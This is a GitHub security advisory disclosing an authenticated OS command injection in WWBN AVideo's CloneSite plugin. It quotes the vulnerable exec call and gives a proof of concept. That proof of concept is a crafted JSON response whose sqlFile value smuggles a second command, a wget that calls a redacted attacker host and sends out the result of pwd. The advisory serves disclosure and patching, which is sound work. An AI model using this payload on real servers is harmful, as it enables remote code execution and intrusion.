WWBN Avideo Authenticated RCE - OS Command Injection

Description

An OS Command Injection vulnerability in an Authenticated endpoint /plugin/CloneSite/cloneClient.json.php allows attackers to achieve Remote Code Execution.

Vulnerable code:

$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

We can control $objClone->cloneSiteURL through the admin panel clone site feature.

/plugin/CloneSite/cloneClient.json.php sends a GET Request to {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially crafted cloneServer.json.php that prints the following JSON data

{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}

Send a GET Request to /plugin/CloneSite/cloneClient.json.php then remote code execution is achieved.

References

DanielnetoDotCom published to WWBN/AVideo Apr 27, 2023

Published to the GitHub Advisory Database Apr 27, 2023

Reviewed Apr 27, 2023

Published by the National Vulnerability Database Apr 28, 2023

Last updated Nov 4, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Remote code injection in wwbn/avideo

Package

Affected versions

Patched versions

Description

WWBN Avideo Authenticated RCE - OS Command Injection

Description

References

Severity

CVSS base metrics

Weaknesses

CVE ID

GHSA ID

Source code

Credits